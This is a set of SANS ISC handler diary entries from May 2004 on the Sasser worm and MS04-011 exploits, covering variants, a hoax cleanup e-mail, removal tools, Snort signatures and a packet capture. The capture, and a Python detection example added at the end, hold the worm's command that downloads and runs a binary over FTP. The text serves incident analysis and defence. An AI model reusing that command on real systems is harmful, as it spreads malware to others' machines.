The Sasser worm outbreak that began early Saturday morning continues. There have been at least 4 distinct variants noted so far. The primary difference between the first 3 was in the name of the file installed and increasing the number of scanning threads from 100 to 1000. The fourth variant, Sasser.d, which started appearing this morning, also added a component that uses pings (ICMP echo requests) to scan for other hosts to infect. It can generate more than 30 packets/sec with no payload. On a network with many unpatched systems, this could lead to network congestion similar to what was seen when Nachi came out last August. Also, because it will scan multicast addresses, there have been some reports that some routers which route multicast traffic have become unstable as a result of Sasser infections. A reminder that systems patched against the issues described in MS04-011 are not vulnerable to this worm. If you haven't patched yet, do so immediately.

One of the ISC handlers, Tom Liston, has captured some of the Sasser.d ICMP activity on his research honeynet and is making the captures available at http://isc.sans.org/presentations/sasser_d.cap.zip

Sasser 'fix' hoax e-mail

This afternoon there is a hoax e-mail making the rounds purporting to be from an anti-virus vendor and claiming to have a clean up tool for Sasser attached. This is, in fact, a new NetSky variant. Anti-virus vendors will never send the tools as attachments in e-mail. Always check the vendor's web site for their latest clean up tools.

Automatic cleanup tools

Microsoft and most of the anti-virus vendors are providing tools for the automatic removal of some of the Sasser variants (see yesterday's diary). While we don't want to discourage people from using these tools, we also don't want the public to get too complacent and think that once they use one of these tools everything is fine. We are seeing a great deal of evidence of multiple infections on machines with Sasser. That is, machines infected with Sasser are often also infected with something else, frequently one of the recent agobot/gaobot/phatbot variants that also target the MS04-011 vulnerabilities. Our standard advice remains, if you get infected, your best course of action is a complete rebuild of the system. If you reinstall a system, or configure a new system, you will have to
enable a firewall before connecting the system to a network. Internal
LANs may be infected as well. Windows XP users may follow our guide:
Windows XP, Surviving the First Day

Alternatively, you may want to use a small hardware firewall appliance.

Jim Clausing, handler on duty


Published: 2004-05-02

Multiple Exploits targeting Microsoft MS-04-011 vulnerabilities threaten networks.

Flash Update (May 3rd 09:30 AM): We did receive some initial reports about a significant rise in ICMP traffic, which may point to a new worm with a Nachi-style ICMP component.

Sasser/SasserB and SasserC are just one component of multiple MS04-011 Exploits Threatening Networks

SasserC, reported by Joe Stewart of security service provider LURHQ ( http://www.lurhq.com ), is currently undergoing analysis. Joe reports that SasserC spawns 1024 threads to attack other systems, and it seems poised to torch networks that are not patched for the MS04-011 vulnerabilities. Let's hope MS shares some real-time numbers of infected systems from their customers' use of the Microsoft Sasser cleaning tool (link below). In addition, Gaobot variants are actively exploiting systems using the MS04-011 vulnerabilities.

Speaking of Gaobot variants, the ISC has received quite a
few submissions of suspected malware this week from participants for analysis.
The suspected malware failed detection by vendor malware scanning applications.
Our recent experience with submitting the new variants to the vendors for
confirmation, identification and deployment of new definitions to detect the
obvious malware indicates that there's a 72 hour lag between submission and
deployment of definitions to detect the malware. During that time, many
Universities are reporting that the malware is causing disruptions and incident
responses ranging from minor to major.

In an effort to reduce their own support costs, many network operators are referring owners of infected systems to Microsoft for support and cleanup help. Microsoft provides free support for virus and trojan infection cleanup:

"Get Help with Security and Virus-related Issues"
"Get free help by phone: 1 (866) 727-2338 (Toll free; US and Canada only)"

ISC and ISC Participants - MS04-011 exploits and Malware Analysis

Handlers and ISC participants contributing to this weekend's analysis (links follow) were: Lorna Hutcheson, Toby Kohlenberg, Scott Fendley, David Tulo (Senior Network Forensics Engineer), Joe Stewart (GCIH, Senior Security Researcher, LURHQ) and Eric Jacobsen (Snort signature).

We would also like to extend a big thanks to all of the other ISC participants who took the time this week to submit their reports of suspicious activity, files of suspected malware and individual efforts at analysis of the exploitation of the Microsoft vulnerabilities announced over the last 6

ISC and ISC Participant analysis of MS-04-011 exploits and Sasser

Handler's Diary May 1st 2004

Handler's Diary April 30th 2004
Sasser Removal Tools

Symantec W32.Sasser Removal Tool

F-Secure Sasser Removal Tool

McAfee Sasser Removal Tool

Microsoft's Sasser Removal Tool

"Step 4: Review Additional Technical Resources - If the cleaning tool above doesn't work for you, use the free worm removal tool available at your preferred antivirus software vendor's Web site"

AV Vendor and Other Sasser Analysis links

LURHQ analysis;

Microsoft's Sasser Warning and Tool Information

Yesterday, May 1st, the top announcement at Microsoft.Com was and still is - "Sasser Worm: Important Information - What to do to protect against or remove the worm - Actions you can take" (click the radio button and there's a tool for removal).
"Step 3: Automatically Check For and Remove Sasser
You can use this tool to search your hard drive for and try to remove the Sasser worm and its variants. To do so, click Check My PC for Infection."

"Check my PC for Infection"

Also "Note If you'd like to run this scanning and cleaning tool manually, you can access it from the Microsoft.com Download Center"


Published: 2004-05-01

Updated: MS04-011 LSASRV Exploit; Sasser Worm Update: Sasser.b

Updated: MS04-011 LSASRV Exploit

We received reports late last night from David Tulo about suspicious traffic. After much analysis by many handlers, and with his help in providing captures and describing what he was seeing (nice analysis job, David), we were able to match the traffic to an exploit against the LSASRV vulnerability in MS04-011. For more information

We also observed and captured similar traffic at two other locations. This traffic matches published exploit code against LSASRV. (Thanks to fellow handler Toby Kohlenberg for pointing out the difference between this traffic and the exploit David was seeing.) The exploit is very similar to Sasser and may mislead folks about what they are seeing. The destination port observed was 445. However, this exploit lacks the FTP attempts and the communication on ports 5554 and 9996, and no files are dropped on the system. It appears to determine the OS type and then attempt to shovel a shell back to a specific IP address. If it fails, LSASS crashes and the system is rebooted.

The possibility exists for this to be turned into a worm. No sign of this yet.

It is important to make sure your systems are patched and that you block traffic on port 445 if possible.

Sasser Worm Update

Sasser.b is already confirmed in the wild. This one however drops a file called avserv2.exe. Here are two links for more information:



Symantec has released their analysis of the Sasser worm and currently have it classified as a Level 3 (for both versions). Their analysis can be found at


Symantec has also provided a tool for the removal of Sasser and it can be found at:


LURHQ ( http://www.lurhq.com ) reports a third version which increases the number of scanning threads to 1024.
The Secunia site provides links to the major vendors and their analysis. They are also listing this as a medium threat right now.

LURHQ has released an analysis of Sasser; it can be found at:

Eric Jacobsen wrote the following snort signature:

updated May 2nd

The first signature detects the sasser ftp command on its backdoor port (9996):

alert tcp $HOME_NET any -> any 9996 ( msg:"Sasser ftp script to transfer up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000000; rev:3;)

The second signature will trigger on the actual ftp download on port 5554:

alert tcp any any -> $HOME_NET 5554 ( msg:"Sasser binary transfer get up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000001; rev:1;)

It is based on this capture of what appears to be Sasser, submitted to the ISC by Eric Conrad:

05/01-12:05:28.458194 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49167 IpLen:20 DgmLen:48 DF

******S* Seq: 0x605F104A Ack: 0x0 Win: 0xFAF0 TcpLen: 28

TCP Options (4) => MSS: 1460 NOP NOP SackOK


05/01-12:05:28.498249 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49168 IpLen:20 DgmLen:40 DF

***A**** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20


05/01-12:05:28.503069 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49169 IpLen:20 DgmLen:41 DF

***AP*** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

65 e


05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF

***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope

6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n

35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec

68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm

64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user&

65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft

70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917

5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp

26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f

74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp -

73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_

75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off&

64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo

20 6F 6E 0A on.


05/01-12:05:29.490393 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49184 IpLen:20 DgmLen:40 DF

***A***F Seq: 0x605F1120 Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20
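As an added example (editor's code, not part of the diary, of Snort, or of the signatures above), the content match the two rules perform can be checked outside Snort, and the FTP script in the capture can be parsed for the host, port and file it fetches, which is what an analyst wants to pull out of such a hit. The payload below is constructed to mirror the captured command string, with the documentation address 192.0.2.10 standing in for the captured host.

```python
"""Apply the Snort content check from the two Sasser rules to a payload and
pull the download target out of the FTP script. Editor-added example; the
payload is constructed, not the diary's capture."""
import re

SNORT_CONTENT = "|5F75702E657865|"   # the content: string in both rules
DEPTH = 250                          # depth:250 in both rules


def snort_content_bytes(spec):
    """Convert a Snort content string to bytes. Text between '|' pairs is
    hex; text outside them is literal, so mixed specs work too."""
    out = b""
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return out


def content_matches(payload, spec=SNORT_CONTENT, depth=DEPTH):
    """Snort depth semantics: the content must lie entirely within the
    first `depth` payload bytes."""
    return snort_content_bytes(spec) in payload[:depth]


# Constructed payload mirroring the captured command string (192.0.2.10 is a
# documentation-range address, not the host seen in the capture).
SAMPLE_PAYLOAD = (
    b"echo off&echo open 192.0.2.10 5554>>cmd.ftp&echo anonymous>>cmd.ftp"
    b"&echo user&echo bin>>cmd.ftp&echo get 31917_up.exe>>cmd.ftp"
    b"&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&31917_up.exe"
    b"&echo off&del cmd.ftp&echo on\n"
)

# "echo open <host> <port>>>cmd.ftp ... echo get <file>>>cmd.ftp"
FTP_SCRIPT_RE = re.compile(
    rb"echo open (?P<host>[\d.]+) (?P<port>\d+)>>cmd\.ftp"
    rb".*?echo get (?P<file>[^>\s]+)>>cmd\.ftp",
    re.S,
)


def extract_ftp_target(payload):
    """Return {host, port, file} for the download the script performs, or
    None when the payload is not a script of this shape."""
    m = FTP_SCRIPT_RE.search(payload)
    if not m:
        return None
    return {
        "host": m.group("host").decode(),
        "port": int(m.group("port")),
        "file": m.group("file").decode(),
    }
```

The host and port recovered this way identify the infected machine serving the binary (port 5554 in the capture, 1023 in the Sasser.E variant noted in the May 8 entry), which is the address to block or chase down, while the filename is what to look for on the victim.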


Lorna Hutcheson


Handler on Duty